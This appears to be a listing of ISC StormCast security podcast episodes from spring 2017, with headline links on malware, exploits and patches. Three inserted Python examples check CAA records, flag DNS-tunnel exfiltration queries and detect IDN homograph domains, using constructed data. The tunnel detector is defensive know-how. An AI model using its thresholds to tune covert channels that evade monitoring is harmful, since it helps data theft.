Domain Shadowing Used in RIG Exploit Kit https://blogs.rsa.com/shadowfall/
6/8/2017, 6 minutes, 2 seconds

ISC StormCast for Wednesday, June 7th 2017

Finding XOR Keys Part 2 https://isc.sans.edu/forums/diary/Malware+and+XOR+Part+2/22490/
Instagram Stories Not Using TLS https://vvyper.com/2017/05/22/instagram-stories-ssl/
Printer "Dots" May Have Led to Arrest of NSA Contractor http://blog.erratasec.com/2017/06/how-intercept-outed-reality-winner.html#.WTc9SMbMyRt
Exfiltrating Data via Blinking LED https://arxiv.org/abs/1706.01140
6/6/2017, 5 minutes, 28 seconds

ISC StormCast for Tuesday, June 6th 2017

Finding XOR Keys Used To Encode Malware https://isc.sans.edu/forums/diary/Malware+and+XOR+Part+1/22486/
Citywide IMSI Discovery https://seaglass.cs.washington.edu
Hijacking Country Level Domains https://thehackerblog.com/the-journey-to-hijacking-a-countrys-tld-the-hidden-risks-of-domain-extensions/index.html
6/6/2017, 7 minutes

ISC StormCast for Monday, June 5th 2017

Phishing Campaigns for Bitcoin https://isc.sans.edu/forums/diary/Phishing+Campaigns+Follow+Trends/22482/
Mouseover May Trigger PowerPoint Macro https://www.dodgethissecurity.com/2017/06/02/new-powerpoint-mouseover-based-downloader-analysis-results/
Vault 7 "Pandemic" Tool https://wikileaks.org/vault7/document/Pandemic-1_1-S-NF/Pandemic-1_1-S-NF.pdf
Mozilla Considering Move Away From OCSP https://bugzilla.mozilla.org/show_bug.cgi?id=1366100
Defending Web Application Security Minneapolis https://www.sans.org/event/minneapolis-2017
Intrusion Detection in Depth Columbia MD https://www.sans.org/event/columbia-2017/course/intrusion-detection-in-depth
6/5/2017, 7 minutes, 34 seconds

ISC StormCast for Friday, June 2nd 2017

Sharing Private Data With Webcast Invitations https://isc.sans.edu/forums/diary/Sharing+Private+Data+with+Webcast+Invitations/22478/
OneLogin Breach https://www.onelogin.com/blog/may-31-2017-security-incident
Google AMP Phishing https://citizenlab.org/2017/05/tainted-leaks-disinformation-phish/
STI Student Paper: Kevin Kelly, TeslaCrypt https://www.sans.org/reading-room/whitepapers/bestprac/indicators-compromise-teslacrypt-malware-37622
6/2/2017, 10 minutes, 47 seconds

ISC StormCast for Thursday, June 1st 2017

Analysis of Competing Hypotheses, WCry and Lazarus https://isc.sans.edu/forums/diary/Analysis+of+Competing+Hypotheses+WCry+and+Lazarus+ACH+part+2/22470/
Windows XP Not Stable Enough for WannaCry https://blog.kryptoslogic.com/malware/2017/05/29/two-weeks-later.html
Mexican Biker Gang Uses Jeep Database to Steal Cars https://regmedia.co.uk/2017/05/31/indictment5_30.pdf
Dangers of Public AWS Snapshots https://www.nvteh.com/news/problems-with-public-ebs-snapshots
6/1/2017, 6 minutes, 10 seconds

ISC StormCast for Wednesday, May 31st 2017

FreeRADIUS Vulnerability https://isc.sans.edu/forums/diary/FreeRadius+Authentication+Bypass/22466/
Microsoft Malware Protection Engine Update http://seclists.org/microsoft/2017/q2/8
Chrome UI Bug May Allow Unnoticed Recording https://medium.com/@barzik/the-new-html5-video-audio-api-has-privacy-issues-on-desktop-chrome-5832c99c7659
AWS Auditing Tools https://summitroute.com/blog/2017/05/30/free_tools_for_auditing_the_security_of_an_aws_account/
SANS Social Denver June 14th https://pages.sans.org/denversocial
5/31/2017, 6 minutes, 32 seconds

ISC StormCast for Tuesday, May 30th 2017

Analysis of Competing Hypotheses https://isc.sans.edu/forums/diary/Analysis+of+Competing+Hypotheses+ACH+part+1/22460/
Microsoft Master File Table BSOD Exploit http://www.theregister.co.uk/2017/05/29/microsoft_master_file_table_bug_exploited_to_bsod_windows_7_81/
SMTP Split Tunnel / Transparent Proxy Exploit https://blog.securolytics.io/2017/05/split-tunnel-smtp-exploit-explained/
5/30/2017, 7 minutes, 10 seconds

ISC StormCast for Friday, May 26th 2017

Samba Remote Code Execution Vulnerability https://isc.sans.edu/forums/diary/Critical+Vulnerability+in+Samba+from+350+onwards/22452/
Pacemaker Vulnerabilities http://blog.whitescope.io/2017/05/understanding-pacemaker-systems.html
Patching May Have Affected Access to Australian Health Systems http://www.cairnspost.com.au/news/cairns-hospital-suffers-software-catastrophe-with-possible-loss-of-patient-data/news-story/c828de3f4a0f73132ec3d19284cbae88
5/25/2017, 13 minutes, 32 seconds

ISC StormCast for Thursday, May 25th 2017

Jaff Ransomware Gets a Makeover https://isc.sans.edu/forums/diary/Jaff+ransomware+gets+a+makeover/22446/
OpenVPN Access Server Vulnerability http://seclists.org/oss-sec/2017/q2/332
Large Credential Dumps Used in Password Brute Forcing Attacks http://info.digitalshadows.com/AccountTakeover-WhitePapersPage_Registration.html
5/25/2017, 6 minutes, 4 seconds

ISC StormCast for Wednesday, May 24th 2017

Multiple Video Players are Vulnerable to Code Execution via Subtitle Files http://blog.checkpoint.com/2017/05/23/hacked-in-translation/
Samsung Galaxy S8 Iris Scanner Bypass https://www.ccc.de/en/updates/2017/iriden
Verizon XSS Flaw in Web Messaging Application https://randywestergren.com/xss-sms-hacking-text-messages-verizon-messages
5/24/2017, 5 minutes, 33 seconds

ISC StormCast for Tuesday, May 23rd 2017

Fake "Uber Disputes" Site Lures Victims With Valid TLS Certificate https://isc.sans.edu/forums/diary/Investigating+Sites+After+They+are+Gone+And+a+Case+of+Uber+Phishing+With+SSL/22440/
Let's Encrypt Outage http://letsencrypt.status.io/pages/history/55957a99e800baa4470002da https://community.letsencrypt.org/t/ocsp-and-issuance-outage-2017-05-19/34506
More ImageMagick Flaws https://scarybeastsecurity.blogspot.com/2017/05/bleed-continues-18-byte-file-14k-bounty.html
5/23/2017, 6 minutes, 45 seconds

ISC StormCast for Monday, May 22nd 2017

Typosquatting: A Recent Example and What to Do With Look-Alike Domains https://isc.sans.edu/forums/diary/Typosquatting+Awareness+and+Hunting/22436/
Netgear Collecting Analytics Data in Recent Update https://kb.netgear.com/000038663/What-router-analytics-data-is-collected-and-how-is-the-data-being-used-by-NETGEAR disable: https://kb.netgear.com/000038661/How-do-I-Enable-Disable-Router-Analytics-Data-Collection
WannaCry Updates https://venturebeat.com/2017/05/19/ransomware-wannacry-causes-fewer-tears-than-feared/
LastPass Authenticator Cloud Backup https://blog.lastpass.com/2017/05/announcing-cloud-backup-for-lastpass-authenticator-easier-multifactor-security-for-everyone.html/
5/22/2017, 5 minutes, 21 seconds

ISC StormCast for Friday, May 19th 2017

Discovering Relevant CVEs with CVE Bot https://isc.sans.edu/forums/diary/My+Little+CVE+Bot/22432/
Probability of Vulnerability Re-Discovery https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2928758
Wannakey May Recover WannaCry Keys https://github.com/aguinet/wannakey
Finding Bad With Splunk https://www.sans.org/reading-room/whitepapers/critical/finding-bad-splunk-3748
5/19/2017, 13 minutes, 8 seconds

ISC StormCast for Thursday, May 18th 2017

HandBrake Proton Malware Used to Steal Source Code https://panic.com/blog/stolen-source-code/
NIST Password Guidance Update https://isc.sans.edu/forums/diary/Wait+What+We+dont+have+to+change+passwords+every+90+days/22428/
Exploiting XXE Vulnerabilities in Peoplesoft https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce
5/18/2017, 5 minutes, 26 seconds

ISC StormCast for Wednesday, May 17th 2017

Docusign Breach Leads to Increase in Phishing Email https://trust.docusign.com/en-us/personal-safeguards/
HP Updates Audio Drivers (twice) to Remove Keylogger https://support.hp.com/us-en/document/c05519670
Chrome File Download Behaviour Can Lead to SMB Credential Theft http://defensecode.com/news_article.php?id=21
5/17/2017, 5 minutes, 34 seconds

ISC StormCast for Tuesday, May 16th 2017

Apple Updates Everything https://support.apple.com/en-us/HT201222 OpenVPN Audit Results https://www.privateinternetaccess.com/blog/2017/05/openvpn-2-4-evaluation-summary-report/ Italian Car Insurance Leaks User Driving Data https://www.andreascarpino.it/posts/how-my-car-insurance-exposed-my-position.html
5/16/2017, 6 minutes, 54 seconds

ISC StormCast for Monday, May 15th 2017

WannaCry Malware Links (latest updates at https://isc.sans.edu) Webcast: https://www.sans.org/webcasts/special-webcast-wannacry-ransomeware-threat-105160 PowerPoint: https://isc.sans.edu/presentations/WannaCry.ppt
5/15/2017, 7 minutes, 11 seconds

ISC StormCast for Friday, May 12th 2017

Conexant Audio Drivers Log Keystrokes https://www.modzero.ch/modlog/archives/2017/05/11/en_keylogger_in_hewlett-packard_audio_driver/index.html Rig Exploit Kit Used to Send Ramnit Trojan https://isc.sans.edu/forums/diary/Seamless+Campaign+using+Rig+Exploit+Kit+to+send+Ramnit+Trojan/22404/ EnCase Forensic Imager Exploit http://blog.sec-consult.com/2017/05/chainsaw-of-custody-manipulating.html
5/12/2017, 13 minutes, 20 seconds

ISC StormCast for Thursday, May 11th 2017

How to Review OAuth Application Permissions for Popular Sites https://isc.sans.edu/forums/diary/OAuth+and+Its+High+Time+for+Some+Personal+SecurityScaping+Today/22400/ Apple Working on Firmware Integrity Check http://apple.stackexchange.com/questions/282028/pop-up-firmware-changes-detected-randomly-appear Panda Mobile Anti-Malware Releases Patch for Evilgrade Bug https://www.contextis.com/resources/blog/exploiting-vulnerable-pandas/ ASUS RT Router Vulnerabilities https://wwws.nightwatchcybersecurity.com/2017/05/09/multiple-vulnerabilities-in-asus-routers/ Microsoft Edge SOP Bypass https://www.brokenbrowser.com/sop-bypass-uxss-stealing-credentials-pretty-fast/ Linux Kernel Packet Socket Vulnerability Exploit https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
5/11/2017, 8 minutes, 42 seconds

ISC StormCast for Wednesday, May 10th 2017

Microsoft Patch Tuesday Summary https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+and+Adobe/22396/ Snake Malware Ported to Mac OS X https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/ Cisco Patches CMP Telnet Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp wolfSSL Library X.509 Certificate Text Parsing Code Execution Vulnerability http://blog.talosintelligence.com/2017/05/wolfssl-x509-vuln.html
5/9/2017, 5 minutes, 49 seconds

ISC StormCast for Tuesday, May 9th 2017

Exploring a P2P Transient Botnet - From Discovery to Enumeration https://isc.sans.edu/forums/diary/Exploring+a+P2P+Transient+Botnet+From+Discovery+to+Enumeration/22392/ Video Conversion Application Handbrake Compromised https://forum.handbrake.fr/viewtopic.php?f=33&t=36364 Emergency Update for Microsoft Malware Protection Engine https://technet.microsoft.com/en-us/library/security/4022344 OS X Keychain OTR Vulnerability https://medium.com/@longtermsec/bypassing-otr-signature-verification-to-steal-icloud-keychain-secrets-9e92ab55b605
5/9/2017, 6 minutes, 35 seconds

ISC StormCast for Monday, May 8th 2017

Tenable Discovers Details Regarding Intel AMT Vulnerability http://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability Android Apps Use Ultrasound Beacons To Track Users http://christian.wressnegger.info/content/projects/sidechannels/2017-eurosp.pdf HTTP Headers... the Achilles' Heel of Many Applications https://isc.sans.edu/forums/diary/HTTP+Headers+the+Achilles+heel+of+many+applications/22382/
5/7/2017, 6 minutes, 5 seconds

ISC StormCast for Friday, May 5th 2017

Google OAuth Phishing Wrap-up https://threatpost.com/1-million-gmail-users-impacted-by-google-docs-phishing-attack/125436/ Artificial Master Fingerprint Set https://wp.nyu.edu/memon/the-master-print/ rpcbind Denial of Service (rpcbomb) https://guidovranken.wordpress.com/2017/05/03/rpcbomb-remote-rpcbind-denial-of-service-patches/ Debian Discontinues FTP Support for Downloads https://www.debian.org/News/2017/20170425
5/5/2017, 5 minutes, 11 seconds

ISC StormCast for Thursday, May 4th 2017

Google Docs OAuth Phishing E-Mails https://isc.sans.edu/forums/diary/OAUTH+phishing+against+Google+Docs+beware/22372/ Review Google App Permissions https://myaccount.google.com/u/0/permissions?pli=1 SS7 Exploits Documented in Banking Attacks http://www.sueddeutsche.de/digital/it-sicherheit-schwachstelle-im-mobilfunknetz-kriminelle-hacker-raeumen-konten-leer-1.3486504 http://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/
5/3/2017, 8 minutes, 26 seconds

ISC StormCast for Wednesday, May 3rd 2017

Scans Sighted for Ports Used by Intel Remote Management Interface (16992/16993) https://isc.sans.edu/port.html?port=16992 https://isc.sans.edu/port.html?port=16993 Outlook Forms Can Run Macros https://sensepost.com/blog/2017/outlook-forms-and-shells/ Jenkins Vulnerability https://jenkins.io/security/advisory/2017-04-26/ Google Android May Patch Day https://source.android.com/security/bulletin/2017-05-01 IBM Storwize USB Stick Malware http://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E
5/2/2017, 5 minutes, 25 seconds

ISC StormCast for Tuesday, May 2nd 2017

Intel AMT, SBT and ISM Escalation of Privilege Vulnerability https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr https://semiaccurate.com/2017/05/01/remote-security-exploit-2008-intel-platforms/ Local Root Exploit in chkrootkit https://lepetithacker.wordpress.com/2017/04/30/local-root-exploit-in-chkrootkit/ Escape Sequence Exploits in Various Linux Terminals http://www.openwall.com/lists/oss-security/2017/05/01/13
5/2/2017, 5 minutes, 54 seconds

ISC StormCast for Monday, May 1st 2017

Simple JavaScript Word Macro Not Recognized by Many AV Products https://isc.sans.edu/forums/diary/Another+Day+Another+Obfuscation+Technique/22354/ OS X Malware Adds Proxy to Intercept HTTPS http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/ OVH Vulnerability Puts Servers at Risk https://jrwr.io/doku.php?id=blog:ovh_vrack_security_issue
5/1/2017, 5 minutes, 50 seconds

ISC StormCast for Friday, April 28th 2017

VISA IP Block Hijacked By Russian ISP https://isc.sans.edu/forums/diary/BGP+Hijacking+The+Internet+is+StillAgain+Broken/22350/ Antminer "Checking" DoS Vulnerability http://www.antbleed.com Symantec Offers Audits To Stave Off Google's CA Blacklisting https://www.symantec.com/connect/blogs/symantec-ca-proposal NoMX Security E-Mail Appliance Pentest https://scotthelme.co.uk/nomx-the-worlds-most-secure-communications-protocol/ vendor response: www.nomx.com SANS Defending Web Applications https://www.sans.org/dev522
4/28/2017, 6 minutes, 17 seconds

ISC StormCast for Thursday, April 27th 2017

Bots Disrupt US ISP https://www.bleepingcomputer.com/news/security/us-isp-goes-down-as-two-malware-families-go-to-war-over-its-modems/ Samsung Smart TV Wi-Fi Direct Exploit http://seclists.org/fulldisclosure/2017/Apr/101 Adobe Publishes ColdFusion Update https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html SNMP Misconfiguration Eliminates Community String Validation (StringBleed) https://stringbleed.github.io/#
4/27/2017, 5 minutes, 35 seconds

ISC StormCast for Wednesday, April 26th 2017

CAA Records and Certificate Issuance https://isc.sans.edu/forums/diary/CAA+Records+and+Certificate+Issuance/22342/ Hyundai Blue Link Information Disclosure https://community.rapid7.com/community/infosec/blog/2017/04/25/r7-2017-02-hyundai-blue-link-potential-info-disclosure-fixed HP, Philips, Fujitsu Display Software Privilege Escalation http://blog.sec-consult.com/2017/04/what-unites-hp-philips-and-fujitsu-one.html
4/26/2017, 5 minutes, 53 seconds
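
An added example for the "CAA Records and Certificate Issuance" entry above (written for this page; it is not the diary's code): it applies the RFC 6844 lookup, climbing from the requested name to its parents until a CAA RRset is found, then decides whether a given CA may issue, honouring "issue", "issuewild", the empty "issue ;" value and the critical flag on unknown tags. The CAA data is a constructed in-memory zone instead of live DNS, the CA names are placeholders, and CNAME chasing at each step is omitted.

```python
# Constructed CAA data for an invented zone, as (flags, tag, value) tuples the
# way a resolver would return them; flag bit 128 is "critical".
CAA_RECORDS = {
    "example.com": [
        (0, "issue", "letsencrypt.org"),
        (0, "iodef", "mailto:security@example.com"),
    ],
    "locked.example.com": [(0, "issue", ";")],                  # nobody may issue
    "wild.example.com": [
        (0, "issue", "letsencrypt.org"),
        (0, "issuewild", "digicert.com"),                       # wildcard certs: one CA only
    ],
    "strict.example.com": [(128, "futuretag", "some-policy")],  # critical, unknown tag
}

KNOWN_TAGS = {"issue", "issuewild", "iodef"}


def parents(name):
    """Yield the name itself, then each parent up to the TLD (the root is not queried)."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        yield ".".join(labels[i:])


def relevant_caa(name, records=CAA_RECORDS):
    """RFC 6844 section 4: the first non-empty CAA RRset found climbing from the name up.

    Returns (owner, rrset); (None, []) when no ancestor has CAA records.
    CNAME/DNAME chasing at each step is omitted in this example.
    """
    for candidate in parents(name):
        rrset = records.get(candidate)
        if rrset:
            return candidate, rrset
    return None, []


def issuer_domain(value):
    """'ca.example; validationmethods=dns-01' -> 'ca.example'; the bare ';' -> ''."""
    return value.split(";", 1)[0].strip().lower()


def may_issue(name, ca, wildcard=False, records=CAA_RECORDS):
    """Decide whether CA `ca` may issue a certificate for `name` under the relevant CAA RRset."""
    _owner, rrset = relevant_caa(name, records)
    if not rrset:
        return True         # no CAA anywhere above the name: any CA may issue
    # A critical record whose tag the CA does not implement forbids issuance.
    if any(flags & 128 and tag not in KNOWN_TAGS for flags, tag, _ in rrset):
        return False
    issue = [issuer_domain(v) for _, tag, v in rrset if tag == "issue"]
    issuewild = [issuer_domain(v) for _, tag, v in rrset if tag == "issuewild"]
    # Wildcard requests use issuewild when present and fall back to issue otherwise.
    allowed = issuewild if (wildcard and issuewild) else issue
    if not allowed:
        return True         # CAA present (e.g. only iodef) but no issue/issuewild restriction
    return ca.lower() in allowed


if __name__ == "__main__":
    checks = [
        ("www.example.com", "letsencrypt.org", False),
        ("www.example.com", "digicert.com", False),
        ("locked.example.com", "letsencrypt.org", False),
        ("wild.example.com", "digicert.com", True),
        ("strict.example.com", "letsencrypt.org", False),
        ("nocaa.example.org", "anyca.example", False),
    ]
    for name, ca, wild in checks:
        owner, _ = relevant_caa(name)
        print(f"{name:22} wildcard={wild!s:5} ca={ca:16} caa_owner={owner} allowed={may_issue(name, ca, wild)}")
```

The last check is the point worth remembering: a name with no CAA record anywhere in its tree is open to every CA, so CAA only protects domains that publish it, and a zone that publishes only an "iodef" record is still unrestricted.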

ISC StormCast for Tuesday, April 25th 2017

Android Malware MilkyDoor Builds Backdoor Into Networks via SSH/SOCKS http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-android-malware-finds-successor-milkydoor/ Remote Code Execution Flaw in SquirrelMail http://seclists.org/fulldisclosure/2017/Apr/81 Atlassian Confluence Update https://confluence.atlassian.com/doc/confluence-security-advisory-2017-04-19-887071137.html TCP Proxy Over Named Pipes / SMB https://github.com/dxflatline/flatpipes
4/25/2017, 5 minutes, 9 seconds

ISC StormCast for Monday, April 24th 2017

Increase in Port 81 Traffic https://isc.sans.edu/forums/diary/WTF+tcp+port+81/22332/ Analyzing a Document and Malware Trying to Exploit CVE-2017-0199 (HTA) https://isc.sans.edu/forums/diary/Malicious+Documents+A+Bit+Of+News/22334/ DOUBLEPULSAR Detected on Tens of Thousands of Systems http://www.theregister.co.uk/2017/04/21/windows_hacked_nsa_shadow_brokers/ NVidia Includes Node.js Server With Drivers http://blog.sec-consult.com/2017/04/application-whitelisting-application.html Android SMSVova Spyware Survives in Google Play Store for 3 Years https://www.zscaler.com/blogs/research/android-spyware-smsvova-posing-system-update-play-store
4/24/2017, 5 minutes, 22 seconds

ISC StormCast for Friday, April 21st 2017

Detecting Covert DNS Channels https://isc.sans.edu/forums/diary/DNS+Query+Length+Because+Size+Does+Matter/22326/ Ambient Light Sensors May Become Accessible Via JavaScript https://blog.lukaszolejnik.com/stealing-sensitive-browser-data-with-the-w3c-ambient-light-sensor-api/ BIND Name Server Update https://kb.isc.org/article/AA-01491 Entropy As A Service https://www.getnetrandom.com Webcast: NoSQL Doesn't Make You NoVulnerable https://www.sans.org/webcasts/nosql-doesnt-novulnerable-104897
4/20/2017, 5 minutes, 56 seconds
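
An added example for the "Detecting Covert DNS Channels" entry above (illustrative code written for this page, not the diary's own tooling): it parses constructed query-log lines, computes query-name length, longest label and the share of digits in the hostname part, and marks a query as a likely tunnel only when two signals agree, because a long name on its own also matches ordinary CDN and cloud hostnames. The log format, the thresholds and the registered-domain approximation (last two labels) are assumptions made for the example.

```python
import re
from collections import Counter

# Constructed sample in the style of a BIND query log reduced to
# "client qtype qname"; the lines are invented for this example.
SAMPLE_LOG = """\
10.0.0.5 A www.example.com
10.0.0.5 AAAA isc.sans.edu
10.0.0.7 TXT 4a6f686e20446f65203132333435.7a6b7178776d61.c2.tunnel.example.net
10.0.0.7 TXT 5468697320697320612074657374.6b6c716a7a7276.c2.tunnel.example.net
10.0.0.9 A cdn-assets-static-images-prod-eu-west-1.example.org
"""

LINE_RE = re.compile(r"^(?P<client>\S+)\s+(?P<qtype>\S+)\s+(?P<qname>\S+)$")


def query_features(qname):
    """Length and composition features of one query name.

    The registered domain is approximated as the last two labels (an
    assumption for this example; use the Public Suffix List in practice).
    """
    name = qname.rstrip(".").lower()
    labels = name.split(".")
    host_part = "".join(labels[:-2])   # the labels a tunnel client fills with payload
    digits = sum(ch.isdigit() for ch in host_part)
    return {
        "qname": name,
        "registered_domain": ".".join(labels[-2:]),
        "length": len(name),
        "longest_label": max(len(label) for label in labels),
        "digit_ratio": digits / len(host_part) if host_part else 0.0,
    }


def classify(features, max_len=52, max_label=30, max_digit_ratio=0.4):
    """Return the names of the signals that fire for one query (thresholds are assumptions)."""
    reasons = []
    if features["length"] > max_len:
        reasons.append("long_qname")
    if features["longest_label"] > max_label:
        reasons.append("long_label")
    if features["digit_ratio"] > max_digit_ratio:
        reasons.append("digit_heavy")
    return reasons


def suspicious_queries(log_text):
    """Parse the log and keep every query for which at least one signal fires.

    One long name is normal for CDN and cloud hostnames, so a query is only
    marked likely_tunnel when two or more signals agree; the rest stay in
    the list for analyst review.
    """
    flagged = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        f = query_features(m["qname"])
        f["client"] = m["client"]
        f["qtype"] = m["qtype"]
        f["reasons"] = classify(f)
        f["likely_tunnel"] = len(f["reasons"]) >= 2
        if f["reasons"]:
            flagged.append(f)
    return flagged


def tunnel_domains(flagged):
    """Likely-tunnel queries per registered domain: the zone the C2 server controls."""
    return Counter(f["registered_domain"] for f in flagged if f["likely_tunnel"])


if __name__ == "__main__":
    hits = suspicious_queries(SAMPLE_LOG)
    for h in hits:
        print(h["client"], h["qtype"], h["length"], h["reasons"], h["likely_tunnel"])
    print(tunnel_domains(hits))
```

On the sample, the two hex-encoded TXT queries fire both "long_qname" and "digit_heavy" and are attributed to example.net, while the 39-character CDN label fires only "long_label" and is left for review; counting likely-tunnel queries per registered domain is what turns individual hits into the C2 zone to block.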

ISC StormCast for Thursday, April 20th 2017

Hunting and Analyzing Malicious Excel Files https://isc.sans.edu/forums/diary/Hunting+for+Malicious+Excel+Sheets/22322/ Bose May Be Spying on Listeners https://www.scribd.com/document/345620278/Bose-Privacy-Complaint Microsoft No-Password Sign-In https://blogs.technet.microsoft.com/enterprisemobility/2017/04/18/no-password-phone-sign-in-for-microsoft-accounts/ ownCloud/Nextcloud Bug Reports Include Passwords https://blog.hboeck.de/archives/885-Passwords-in-the-Bug-Reports-OwncloudNextcloud.html Fuzzing Used to Find a tcpdump Vulnerability https://www.softscheck.com/en/identifying-security-vulnerabilities-with-cloud-fuzzing/ DNS Homograph Detection https://github.com/dutchcoders/homographs For Friday's and other upcoming webcasts, see https://www.sans.org/webcasts
4/20/2017, 5 minutes, 40 seconds

ISC StormCast for Wednesday, April 19th 2017

Details About How to Exploit CVE-2017-0199 https://rewtin.blogspot.com.au/2017/04/cve-2017-0199-practical-exploitation-poc.html User-Provided Patch to Help Update Old Operating Systems on New CPUs https://github.com/zeffy/kb4012218-19 Forensics Tools and Issues With Windows 10 Compact OS https://www.heise.de/security/artikel/Forensik-Tools-patzen-bei-neuer-Windows-Kompression-3676075.html
4/19/2017, 5 minutes, 54 seconds

ISC StormCast for Tuesday, April 18th 2017

Detecting IDN Phishing Domains https://isc.sans.edu/forums/diary/Tool+to+Detect+Active+Phishing+Attacks+Using+Unicode+LookAlike+Domains/22310/ Old Linux Kernel Bug Allows for Remote Code Execution via UDP https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=197c949e7798fbf28cfadc69d9ca0c2abbf93191 Microsoft Edge JavaScript "fetch" Function Can Be Used to Leak User Data http://mov.sx/2017/04/16/microsoft-edge-leaks-url.html
4/18/2017, 7 minutes, 8 seconds
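
An added example for the "Detecting IDN Phishing Domains" entry above and the "DNS Homograph Detection" entry of April 20th (written for this page; it is neither the diary's tool nor the dutchcoders/homographs project): it decodes punycode labels with Python's built-in idna codec, checks each label for mixed scripts, and reduces the name to an ASCII skeleton via NFKD and a small hand-picked confusables table so it can be compared against a watchlist of protected domains. The watchlist, the confusables subset and the sample domains are constructed.

```python
import unicodedata

# Constructed watchlist of domains to protect (example data).
WATCHLIST = {"apple.com", "paypal.com", "google.com", "sans.edu"}

# Hand-picked subset of Unicode confusables (the full table is UTS #39's
# confusables.txt); enough for the sample domains below, not complete.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",   # Cyrillic a e o r
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0456": "i",   # Cyrillic s u kh i
    "\u04cf": "l", "\u0458": "j", "\u0501": "d",                  # palochka, je, komi de
    "\u03bf": "o", "\u03b1": "a", "\u03bd": "v", "\u03b9": "i",   # Greek omicron alpha nu iota
}


def to_unicode(domain):
    """Lower-case the name and decode any punycode (xn--) label with the stdlib idna codec."""
    labels = []
    for label in domain.lower().rstrip(".").split("."):
        if label.startswith("xn--"):
            try:
                label = label.encode("ascii").decode("idna")
            except UnicodeError:
                pass            # malformed punycode: keep the raw label for review
        labels.append(label)
    return ".".join(labels)


def script_of(ch):
    """First word of the Unicode character name: LATIN, CYRILLIC, GREEK, ..."""
    return unicodedata.name(ch, "UNKNOWN").split()[0]


def label_scripts(domain):
    """Set of scripts used by the letters of each label, in label order."""
    return [{script_of(ch) for ch in label if ch.isalpha()} for label in domain.split(".")]


def skeleton(domain):
    """ASCII look-alike form: NFKD, drop combining marks, map confusables."""
    out = []
    for ch in unicodedata.normalize("NFKD", to_unicode(domain)):
        if unicodedata.combining(ch):
            continue                         # u-umlaut -> u, e-acute -> e
        out.append(CONFUSABLES.get(ch, ch))
    return "".join(out)


def analyze(domain, watchlist=WATCHLIST):
    """Flag mixed-script labels and names whose skeleton matches a protected domain."""
    uni = to_unicode(domain)
    skel = skeleton(uni)
    return {
        "input": domain,
        "unicode": uni,
        "skeleton": skel,
        "is_idn": any(ord(ch) > 127 for ch in uni),
        # Mixed scripts inside one label (paypal with a Cyrillic a) are easy to
        # catch; a label written entirely in one non-Latin script is not, which
        # is why the skeleton comparison is needed as well.
        "mixed_script": any(len(s) > 1 for s in label_scripts(uni)),
        "lookalike_of": skel if skel in watchlist and skel != uni else None,
    }


if __name__ == "__main__":
    # Constructed samples: whole-script Cyrillic "apple" (given as punycode),
    # mixed-script "paypal", a legitimate German IDN and a plain ASCII name.
    samples = [
        "\u0430\u0440\u0440\u04cf\u0435.com".encode("idna").decode("ascii"),
        "p\u0430ypal.com",
        "m\u00fcnchen.de",
        "www.sans.edu",
    ]
    for s in samples:
        r = analyze(s)
        print(r["input"], r["unicode"], r["skeleton"], r["mixed_script"], r["lookalike_of"])
```

The all-Cyrillic "apple" sample passes a mixed-script check (every letter is from one script, and the "com" label is checked separately), so only the skeleton comparison catches it, while the German IDN is non-ASCII but matches nothing on the watchlist; a detector needs both tests and a list of the brands it is meant to protect.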

ISC StormCast for Monday, April 17th 2017

Detecting SMB Covert Channel "DoublePulsar" https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/ ETERNALBLUE: Windows SMBv1 Exploit (Patched) https://isc.sans.edu/forums/diary/ETERNALBLUE+Windows+SMBv1+Exploit+Patched/22304/
4/17/2017, 5 minutes, 35 seconds

ISC StormCast for Friday, April 14th 2017

Packet Captures Filtered by Process https://isc.sans.edu/forums/diary/Packet+Captures+Filtered+by+Process/22296/ CLDAP Used to Amplify DDoS Attack https://isc.sans.edu/forums/diary/Akamai+reports+UDP+DDOS+Using+CLDAP+reaching+24Gbps/22300/ Juniper Updates https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES SAP Patches Code Injection in TREX https://erpscan.com/press-center/press-release/critical-vulnerability-affects-sap-hana-dozen-sap-applications/ More Details About Dallas Siren Hack https://duo.com/blog/the-dallas-county-siren-hack
4/14/2017, 5 minutes, 42 seconds

ISC StormCast for Thursday, April 13th 2017

Mole Ransomware Delivered via Fake USPS E-Mails https://isc.sans.edu/forums/diary/Malspam+on+20170411+pushes+yet+another+ransomware+variant/22290/ Identifying HTTPS-Protected Netflix Videos in Real-Time https://www.mjkranch.com/docs/CODASPY17_Kranch_Reed_IdentifyingHTTPSNetflix.pdf SMS Messages Used to Control Oven https://www.pentestpartners.com/blog/iot-Aga-cast-iron-security-flaw/ Android Hardening TLS Use https://android-developers.googleblog.com/2017/04/android-o-to-drop-insecure-tls-version.html
4/13/2017, 5 minutes, 52 seconds

ISC StormCast for Wednesday, April 12th 2017

MSFT/Adobe Patch Tuesday https://isc.sans.edu/forums/diary/April+2017+Microsoft+Patch+Tuesday/22288/ Solaris 0-Day https://twitter.com/hackerfantastic/status/851555538597011460 OWASP Top 10 Update https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf
4/12/2017, 5 hours

ISC StormCast for Tuesday, April 11th 2017

